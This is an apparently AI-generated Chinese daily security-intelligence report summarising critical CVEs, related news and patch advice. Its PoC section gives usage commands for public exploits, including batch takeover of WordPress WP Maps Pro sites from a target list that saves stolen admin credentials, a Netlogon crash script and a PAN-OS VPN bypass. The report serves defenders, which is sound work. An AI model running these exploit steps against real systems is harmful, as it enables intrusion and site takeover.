每日安全情报报告 · 2026-06-03
数据采集时间:2026年6月3日 08:00 (UTC+8)
覆盖范围:近48小时新增高危漏洞、公开PoC、安全资讯
风险级别标注:🔴 严重 (CVSS ≥ 9.0) | 🟠 高危 (CVSS 7.0--8.9) | ⚠️ 在野利用
一、最新高危漏洞(CVE)
🔴 CVE-2026-45618 --- LiquidJS 远程代码执行 ⚠️ 已公开PoC
| 项目 | 详情 |
|---|---|
| CVSS | 10.0(严重) |
| 漏洞类型 | 模板注入 → 远程代码执行 (RCE) |
| 受影响组件 | LiquidJS(Node.js 模板引擎,月下载量 730 万) |
| 影响版本 | < 10.26.0 |
| 修复版本 | 10.26.0 |
| 发布时间 | 2026-05-27(近日持续发酵) |
概述 :LiquidJS 的 Liquid 类构造函数中存在原型污染漏洞,攻击者可通过构造恶意的过滤器表达式获取 Function 构造函数引用,从而在 Node.js 服务端执行任意系统命令。由于该库广泛应用于 Shopify 生态、Jekyll 静态站点生成器等场景,影响面极广。
🔴 CVE-2026-41089 --- Windows Netlogon 零点击 RCE ⚠️ 在野利用
| 项目 | 详情 |
|---|---|
| CVSS | 9.8(严重) |
| 漏洞类型 | 栈缓冲区溢出 (Stack Buffer Overflow) |
| 受影响组件 | Windows Netlogon 服务(域控制器核心组件) |
| 影响版本 | Windows Server 2012/2016/2019/2022/2025(所有64位版本) |
| 修复方式 | 安装微软 2026年5月安全更新 |
| 发布时间 | 2026-05-12(近日确认在野利用) |
概述 :Windows Netlogon 服务处理 CLDAP 查询时存在栈缓冲区溢出漏洞。未经身份验证的攻击者可通过 UDP 389 端口发送单个特制数据包,溢出 528 字节的栈缓冲区,导致 LSASS 进程崩溃或实现远程代码执行。比利时网络安全中心 (CCB) 已确认该漏洞在野利用,域控制器面临严重威胁。
🔴 CVE-2026-49448 --- authentik 认证绕过
| 项目 | 详情 |
|---|---|
| CVSS | 9.8(严重) |
| 漏洞类型 | 授权问题 / Source Stage 绕过 |
| 受影响组件 | authentik(开源身份提供商,Go 语言) |
| 影响版本 | < 2025.12.6 / < 2026.2.4 / < 2026.5.1 |
| 修复版本 | 2025.12.6 / 2026.2.4 / 2026.5.1 |
| 发布时间 | 2026-06-02 |
概述:authentik 的 Source Stage 认证流程存在严重绕过漏洞,攻击者可通过发送空 POST 请求完全绕过身份验证,直接获取未授权访问权限。authentik 被广泛用于企业 SSO 和身份管理场景,建议立即升级。
🔴 CVE-2026-5076 --- WordPress ARMember Premium 密码重置绕过
| 项目 | 详情 |
|---|---|
| CVSS | 9.8(严重) |
| 漏洞类型 | 不安全密码重置 → 未授权权限提升 |
| 受影响组件 | WordPress ARMember Premium 插件 |
| 影响版本 | ≤ 7.3.1 |
| 发布时间 | 2026-06-02 |
概述:ARMember Premium 插件将用户密码的明文副本存储在不安全的机制中,攻击者无需认证即可利用密码重置功能直接获取管理员权限。该插件在 WordPress 生态中广泛使用,影响大量会员制站点。
🔴 CVE-2026-8732 --- WordPress WP Maps Pro 权限提升 ⚠️ 在野利用
| 项目 | 详情 |
|---|---|
| CVSS | 9.8(严重) |
| 漏洞类型 | 未授权权限提升 → 管理员账户创建 |
| 受影响组件 | WordPress WP Maps Pro 插件(Envato 市场 15000+ 销量) |
| 影响版本 | ≤ 6.1.0 |
| 修复版本 | 6.1.1 |
| 发布时间 | 2026-05-28(近日大规模在野利用) |
概述 :WP Maps Pro 插件的"临时访问"AJAX 端点缺乏有效身份验证,且 Nonce 令牌因代码设计缺陷而泄露。Wordfence 监测到自 6月1日 以来已发生 3600+ 次针对该漏洞的实际攻击。攻击者可直接创建管理员账户并完全控制目标站点。
🔴 CVE-2026-32625 --- LibreChat 服务端密钥泄露
| 项目 | 详情 |
|---|---|
| CVSS | 9.6(严重) |
| 漏洞类型 | 信息泄露 (SSRF via MCP) |
| 受影响组件 | LibreChat(增强版 ChatGPT 克隆,支持多 AI 提供商) |
| 影响版本 | ≤ 0.8.3 |
| 发布时间 | 2026-06-02 |
概述 :LibreChat 的 MCP(Model Context Protocol)服务器集成在处理 ${VAR} 模板变量时存在变量解析缺陷,攻击者可通过 SSRF 泄露服务器环境变量、API 密钥、数据库凭据等敏感信息。
🔴 CVE-2026-42849 --- authentik XSS
| 项目 | 详情 |
|---|---|
| CVSS | 9.3(严重) |
| 漏洞类型 | 跨站脚本攻击 (XSS) |
| 受影响组件 | authentik SFE(Simple Flow Executor) |
| 影响版本 | < 2025.12.5 / < 2026.2.3 |
| 修复版本 | 2025.12.5 / 2026.2.3 |
| 发布时间 | 2026-06-02 |
概述:authentik 的 Simple Flow Executor 组件存在 XSS 漏洞,攻击者可劫持包含令牌的 Web 请求,重定向用户并窃取认证凭据。
🔴 CVE-2026-32999 --- Comet Backup 远程代码执行
| 项目 | 详情 |
|---|---|
| CVSS | 9.1(严重) |
| 漏洞类型 | 远程代码执行 (RCE) |
| 受影响组件 | Comet Backup 服务器 |
| 影响版本 | < 26.4.3 / < 26.5.0 |
| 发布时间 | 2026-05-29(近日持续关注) |
概述:Comet Backup 备份代理签名模块存在字符过滤不足问题,认证的租户管理员可通过上传恶意 .dll/.so 文件实现以特权用户身份执行任意代码,完全控制备份服务器并泄露客户数据。
🟠 CVE-2026-0257 --- PAN-OS GlobalProtect 认证绕过 ⚠️ 在野利用
| 项目 | 详情 |
|---|---|
| CVSS | 9.1(严重) |
| 漏洞类型 | 身份验证绕过 |
| 受影响组件 | Palo Alto Networks PAN-OS GlobalProtect(网关 + 门户) |
| 发布时间 | 2026-05-13(近日大规模在野利用) |
概述 :PAN-OS GlobalProtect 网关和门户组件存在身份验证绕过漏洞。未经认证的攻击者可直接绕过安全限制建立 VPN 连接,获取企业内网访问权限。已被 CISA 列入已知被利用漏洞 (KEV) 目录,野外活跃利用自 5月17日 开始,目前攻击规模持续扩大。
🟠 其他高危漏洞
| CVE 编号 | CVSS | 组件 | 类型 | 链接 |
|---|---|---|---|---|
| CVE-2026-49443 | 8.8 | authentik | 授权问题 | 查看详情 |
| CVE-2026-49143 | 8.8 | BrowserStack Runner | 代码注入 | 查看详情 |
| CVE-2026-47201 | 8.5 | authentik | 未明确 | 查看详情 |
| CVE-2022-4992 | 8.6 | Dräger Infinity M540 | 未明确 | 查看详情 |
| CVE-2021-4481 | 8.2 | Dräger Protector | 本地提权 | 查看详情 |
二、漏洞 PoC(概念验证)
PoC 1:CVE-2026-41089 --- Windows Netlogon CLDAP 栈溢出
- GitHub :0xABCD01/CVE-2026-41089
- 语言:Python 3.8+(无第三方依赖)
- 效果:拒绝服务(LSASS 崩溃 / 域控制器重启),理论可 RCE
使用步骤:
bash
# 1. 克隆仓库
git clone https://github.com/0xABCD01/CVE-2026-41089.git
cd CVE-2026-41089
# 2. 验证目标存活(无害测试)
python3 poc.py 10.0.50.21 corp.local
# 3. 触发栈溢出(默认 130 字节恶意用户名)
python3 poc.py 10.0.50.21 corp.local -l 130
# 4. 自定义参数(慢网络环境)
python3 poc.py 10.0.50.21 corp.local -l 200 -t 10⚠️ 注意:该 PoC 仅实现 DoS 效果,未包含完整 RCE 利用代码。仅限授权测试使用。
PoC 2:CVE-2026-8732 --- WordPress WP Maps Pro 权限提升
- GitHub :xShadow-Here/CVE-2026-8732
- 语言:Python 3
- 效果:创建管理员账户,完全控制 WordPress 站点
- 已知在野利用:3600+ 次攻击(Wordfence 监测)
使用步骤:
bash
# 1. 克隆仓库
git clone https://github.com/xShadow-Here/CVE-2026-8732.git
cd CVE-2026-8732
# 2. 单目标利用
python3 shadow.py -u https://target.com
# 3. 批量利用(从 targets.txt 读取目标列表,20 并发)
python3 shadow.py -f targets.txt -t 20
# 4. 交互式模式
python3 shadow.py攻击成功后,结果保存在 pwned.txt,包含管理员用户名、密码和魔法登录链接。
PoC 3:CVE-2026-0257 --- PAN-OS GlobalProtect 认证绕过
- GitHub :0xBlackash/CVE-2026-0257
- 语言:Python
- 效果:绕过 GlobalProtect VPN 认证,获取内网访问权限
- 状态:已被 CISA KEV 收录,野外活跃利用
使用步骤:
bash
# 1. 克隆仓库
git clone https://github.com/0xBlackash/CVE-2026-0257.git
cd CVE-2026-0257
# 2. 安装依赖
pip install -r requirements.txt
# 3. 执行利用
python3 exploit.py -t <target_ip> -p <portal_port>⚠️ 仅限授权测试。Palo Alto Networks 已发布补丁,建议优先升级 PAN-OS。
三、网络安全最新文章
1. Red Hat Cloud Services 官方 npm 包遭 CI/CD 注入攻击(供应链攻击)
日期 :2026-06-01 | 来源:Ars Technica / Red Hat 官方
Red Hat 官方确认其 @redhat-cloud-services npm 命名空间下 32 个包遭 CI/CD 流程注入攻击,被植入自传播凭证窃取恶意软件。攻击者通过入侵 Red Hat 的 CI/CD 管道,注入了窃取开发者 SSH 密钥、云服务凭证和 API 令牌的后门代码。过去 36 小时内接触过受影响包的工作站和 CI/CD 环境均应视为已被攻陷。
2. 近 2000 个 WordPress 站点利用 Steam 资料评论隐藏 C2 指令
日期 :2026-06-02 | 来源:Security Affairs / GoDaddy
GoDaddy 安全研究团队发现一种新型恶意软件攻击活动,感染了近 2000 个 WordPress 站点,攻击者将 C2(命令与控制)指令隐藏在 Steam 社区资料评论中,使用不可见的 Unicode 字符编码恶意数据。这是一种新型隐写式 C2 通信方法,利用了 Steam 作为可信平台的优势来规避传统安全检测。
3. Operation Dragon Weave:AZUREVEIL Adaptix C2 鱼叉式钓鱼攻击
日期 :2026-06-02 | 来源:Cyber Security News / Aviatrix
安全研究人员发现代号为"Operation Dragon Weave"的网络间谍活动,攻击者通过鱼叉式钓鱼邮件部署 AZUREVEIL(基于 Adaptix 框架的 C2 代理),针对捷克和中国台湾的政府官员、研究人员和技术工作者。该恶意软件使用 RUSTCLOAK 加壳,在超过 10 万个沙箱环境检查后才执行恶意载荷,逃避检测能力极强。
4. Notepad++ 高危漏洞曝光:可直接执行恶意代码
日期 :2026-06-01 | 来源:FreeBuf
研究人员在 Notepad++ 中发现两个新漏洞:CVE-2026-25926 (不安全搜索路径,可导致 RCE)和 CVE-2026-48770(本地拒绝服务)。攻击者可利用 DLL 侧加载技术,在用户打开 Notepad++ 编辑器时执行恶意代码。建议所有用户立即更新至 8.9.2 及以上版本。
5. Akira 勒索组织利用 9.1 分高危漏洞攻击 SonicWall Gen6 LDAP MFA
日期 :2026-06-02 | 来源:微信公众号 / 安全分析与研究
Akira 勒索软件组织正在大规模利用 SonicWall Gen6 防火墙的 LDAP MFA 高危漏洞(CVE-2024-12802,CVSS 9.1)发起攻击。尽管 SonicWall 早在 2025年3月 发布补丁,但由于官方修复方案未强制要求 LDAP 配置变更,大量已"打补丁"的设备实际上仍处于脆弱状态。安全研究员已完整还原了攻击利用链。
6. 智普输入法 Windows 安装包疑似遭供应链投毒
日期 :2026-06-02 | 来源:mrxn.net
智普输入法(智谱 AI 旗下)Windows 安装包被发现数字签名异常失效,安全专家怀疑安装包在分发链条中遭篡改或投毒。数字签名是验证软件来源真实性的最后防线,其失效意味着用户无法确认安装包未被恶意修改。建议已安装用户立即进行安全排查。
7. LiquidJS RCE 漏洞深度分析:730 万月下载用户面临系统接管风险
日期 :2026-06-01 | 来源:FreeBuf / Orca Security
CVE-2026-45618(CVSS 10.0)影响 Node.js 生态中广泛使用的 LiquidJS 模板引擎。漏洞根因是 Liquid 类构造函数中的原型污染,攻击者通过构造恶意模板中的过滤器表达式,可获取 JavaScript Function 构造函数引用,进而执行任意系统命令。该漏洞利用门槛极低,影响范围涵盖 Jekyll、Shopify 等数以百万计的下游项目。
8. CVE-2026-41089 深度解析:继 Zerologon 之后 Netlogon 再爆"核弹级"零点击 RCE
日期 :2026-06-02 | 来源:微信公众号 / 安全通告
Windows Netlogon 服务栈缓冲区溢出漏洞(CVE-2026-41089,CVSS 9.8)被业界称为 Zerologon 2.0。攻击者仅需发送一个 CLDAP UDP 包即可触发 528 字节栈缓冲区溢出。比利时 CCB 已确认在野利用,所有未安装 2026年5月 安全更新的 Windows Server 域控制器均处于风险之中。
四、威胁态势总结
| 类别 | 数量 | 重点关注 |
|---|---|---|
| 🔴 严重漏洞 (CVSS ≥ 9.0) | 9 个 | LiquidJS RCE (10.0)、Netlogon RCE (9.8)、authentik 绕过 (9.8) |
| 🟠 高危漏洞 (CVSS 7.0--8.9) | 5 个 | authentik、BrowserStack、Dräger 系列 |
| ⚠️ 已确认在野利用 | 3 个 | Netlogon RCE、PAN-OS VPN 绕过、WP Maps Pro |
| 📦 供应链攻击事件 | 3 起 | Red Hat npm、智普输入法、LiquidJS 生态 |
| 🛠️ 公开 PoC | 3 个 | Netlogon、WP Maps Pro、PAN-OS GlobalProtect |
行动建议
- 立即修补:LiquidJS(升级至 10.26.0+)、Windows Server(安装 5月安全更新)、authentik(升级至最新版本)
- 供应链自查:使用 Red Hat npm 包的项目应立即轮换所有密钥和凭证,审计 CI/CD 环境
- VPN 加固:PAN-OS 用户尽快安装官方补丁,限制 GlobalProtect 门户暴露面
- WordPress 巡检:排查 ARMember Premium 和 WP Maps Pro 插件版本,删除不必要的管理员账户
- Steam C2 检测:WordPress 站点管理者应检查是否存在异常的 Steam 资料评论通信行为
本报告由 AI 自动化生成,数据来源包括 NVD、MITRE CVE、GitHub Advisory、The Hacker News、FreeBuf、安全客、Wordfence、CISA 等。部分链接可能因平台限制无法直接访问,建议通过标题搜索获取原文。